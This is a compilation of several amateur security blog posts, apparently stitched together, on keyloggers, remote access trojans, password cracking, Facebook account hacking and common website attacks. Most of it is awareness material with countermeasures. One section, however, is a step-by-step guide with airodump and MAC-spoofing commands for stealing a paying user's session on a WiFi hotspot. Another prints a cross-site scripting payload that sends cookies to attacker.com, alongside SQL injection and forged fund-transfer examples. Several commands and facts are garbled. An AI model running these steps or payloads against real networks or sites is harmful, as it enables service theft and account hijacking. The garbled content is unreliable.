What Is Keylogger And How To Be Safe From Keyloggers?

keyloggers In this tutorial i am going to talk about the most use piece of software besides from RAT by hackers to observe your activities on your computer and that is keyloggers. keylogger is a software or hardware device which monitors each and every key typed by you on your keyboard. I am going to talk about different types of keylogger and how to be safe from keyloggers. So lets learn somthing about keyloggers.

1. What is keylogger ?

You might have heard about keyloggers but really dont know what they are reading this article will clear your mind. A keylogger also know as keystroke logger is software or hardware device which monitors each and every key typed by you on your keyboard. You can not identify the presence of keylogger on your computer since it runs in background and also it is not listed in task manager or control panel. It can be used by parents to keep eye on their childrens or company owner to spy on their employes.

2. How it can harm you ?

In this section i will talk about how keylogger can harm you in different ways for example It can be used by your enemy or friend to get sensitive information such as your username and password, Bank credit card details, or any other activities you do on your computer.
  • Example: You login in to your Facebook account from a computer in which keylogger is install then your username and password will be captured.

3. Types of  keyloggers

There are two types of keylogger hardware keylogger and software keylogger. Software keylogger is install in your computer where as a Hardware keylogger is attached to your keyboard. Looking at below images will clear your mind.

                              HARDWARE KEYLOGGER
hardware keyloggers

 SOFTWARE KEYLOGGER
 software keyloggers

 4. How to Protect yourself from keyloggers ?

Keylogger  can be used by your enemy  to get sensitive information such as your Bank credit card details, or password of any social networking sites etc. In order to be safe keep following points in your mind.
  • Never use your online banking from cyber cafe. If you want to use then you can try this method. open notepad and type anything Then copy and paste each word that comes in your username or password.
  • You can even use above method to protect your facebook profile, yahoo or gmail id.
  • When you enter cyber cafe make sure that no hardware device is attached to keyboard wire. Its look something similar to above image.

What Is RAT Or Remote Access Trojan ?

remote access trojan or ratRAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basically anything with your computer. Using RAT hacker can install keylogger and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

What You Can do With RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:
  • Infecting Files
  • Installing Keyloggers
  • Controlling Computer
  • Remotely start webcam, sounds, movies etc
  • Using your PC to attack Website (DDOS)
  • View Screen

 Harmless RAT or Good RAT

As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one's computer with his permission for file transfer, sharing your screen and more.

 Some Commonly Used RAT

  • ProRAT
  • CyberGate RAT

6 Most Common Password Cracking Methods And Their Countermeasures

6 method used to crack passwords
There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out this article to be safe and to prevent your online accounts from hacking.

1. BruteForce Attack

brute force attack
Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computer and complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

keylogger
In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. Check out below article to know more about Rats and Keyloggers.

4. Phishing

phishing hacking
Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two "b"). Always make sure that websites url is correct. Check out below article to know more about phishing.

5. Rainbow Table

A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords.

Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

6. Guessing

password guessing
This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess your password. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

HOW TO BYPASS WI FI HOTSPOT ACCESS CONTROL BY SESSION STEALING

Let us see how to do that using backtrack linux and bypass the WiFi Hotspot access control.
Step 1:
Boot into your Backtrack Linux.  Start Wireless Assistant in Backtrack & confirm you have some wireless network around. Then you can click “Connect” to that network. It won’t let you connect because you are not the paid user. It will open up browser and will ask you to pay for usage.
Close it.
Step 2: Connectin up With Wi Fi Network (rausb0)
There are multiple ways you can do this & very simple would be to use Ping Scan from backtrack. I am demonstrating here by using AiroDump which will be an add on method for you to learn.
Open up your Shell or Konsole form Backtrack & now we have to put network in Monitor mode.
Type in ifconfig -a (Hit Enter)
You ll see list of network interfaces. I see “rausb0” in my list which I want to connect so type in following and hit enter again.
ifconfig rausb0 up
Now your network is up & we have to put network in monitor mode so type in following.
iwconfig rausb0 mode monitor (Hit Enter)
iwconfig (Enter again)
So now we are up in monitor mode. We have to start Airodump Next.
Step 3: Start Airodump
In the same shell type in
airo (Enter)
Then, type next
airodump –ng rausb0 ( Enter again)
Now we will see the SSID of the whole network. We have to find the user’s MAC address that is already on a network.
Step 4: Capturing MAC Address For Spoofing (of Connected User)
You ll see a list of SSID’s around there. But at the end of all lines you have to find out the name of Wi Fi access point.
E.g – You’ll Find attwifi if you are on the AT&T wifi network. As shown in following image.
MAC Address Session Stealing
You have to copy the MAC address corresponding to that wifi network. And use it in following command.
airodump –ng –bssid xx:xx:xx:xx:xx:xx rausb0 (Replace copied MAC Address at XX & Hit Enter)
It will now open up the rausb0 interface & will take some time to find out network traffic. Then you’ll see some stations with its packet data flow information. For security pick up the station that have more data packets flowing. (Like more than 30-40)
Copy the MAC ADDRESS of this station.
Now you have finalized the address to replace as our MAC address, you have to put back the network to Manage mode from monitor Mode.
If you have USB dongle plugged in simply unplug it, change MAC adrdress and plug it back again. If you are not USB dongle type in following and it enter again.
Ifconfig rausb0 down
Step 5 : Changing MAC Address
In your shell type in mac and hit enter to change MAC Address.
macchange –m xx:xx:xx:xx:xx:xx rausb0 (replace xx with copied MAC address & Enter)
Now you’ll see current MAC address & Fake MAC address .
Now you have to plug back in your USB you took out few minutes ago. Or if you have used command to put your interface down use following command to put it back up.
Ifconfig rausb0 up
Now your MAC address successfully changed you can check by typing ifconfig in console.
Step 6: Connecting to Hacked Wi Fi Network
Now you are done at Bypassing Wi Fi HotSpot’s Access Control Using Session Stealing & you can connect to hotspot as follows.
1. Open Wireless Assistant.
2. Select Network
3. Hit Connect
And you’re done !!!

Mostly Hackers use these methods to hack facebook account, So protect yourself from hackers. Must Read this post, and beware from hackers,

1. Hack Facebook Account Password By Phishing

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims “Email Address” and “Password” is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

2. Hack Facebook Account Password By Keylogging

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim’s computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealer’s

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer’s are software’s specially designed to capture the saved passwords stored in the victims Internet browser.
Latest Tricks :

4. Hack Facebook Account Password By Session Hijacking

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Sidejacking With Firesheep

Sidejacking attack went common in late 2010, however it’s still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it’s more targeted towards WiFi users.

6. Mobile Phone Hacking

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying software’s used to monitor a Cellphone. The most popular Mobile Phone Spying software’s are: Mobile Spy, and Spy Phone Gold.

7. DNS Spoofing

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8. USB Hacking

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attacks

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Botnets

Botnets are not commonly used for hacking Facebook accounts, because of it’s high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.
All the methods that generally hackers can use these methods to how to hack facebook account password. Mostly hackers use these methods to how to  hack facebook account password , so i’m tell you read these all hacking steps and beware from hackers or any crackers. Don’t do any illigal activity beacuse Hacking is illigal. i’m shared this post only for security purpose. We get numerous emails on a daily basis asking us to how to Hack friends Facebook/E-mail account  If your email falls into any of the above categories we will not help you.

10 MOST POPULAR WAYS HACKERS HACK YOUR WEBSITE

Ways Hackers Hack Your Site
Pop quiz: what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?
They’ve all been recently hacked.
Yes, hacking is a growing threat for every business both large and small.
Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time.
Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.
In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:
String query = “SELECT * FROM accounts WHERE custID='” + request.getParameter(“id”) +”‘”;
The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

9.  CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.
For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:
(String) page += “<input name=’creditcard’ type=’TEXT’ value='” + request.getParameter(“CC”) + “‘>”;
The attacker modifies the ‘CC’ parameter in their browser to:
‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’
This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.
Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).
If a hacker exploits the authentication and session management system, they can assume the user’s identity.
Scary indeed.
Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:
  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?
If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.
Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.
For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:
And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:

6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.
Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.
This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.
In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.
It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.
The problem, of course, is that you’re not getting into what you think you’re getting into.
A classic example of a social engineering attack is the “Microsoft tech support” scam.
This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.
Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.
If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.
In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.
In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.
In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:
<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />
In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.
Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.
The following vulnerable components were downloaded 22 million times in 2011:
By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.
And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.
It’s kind of like having your car stolen when you really need to get somewhere fast.
The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.
The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.
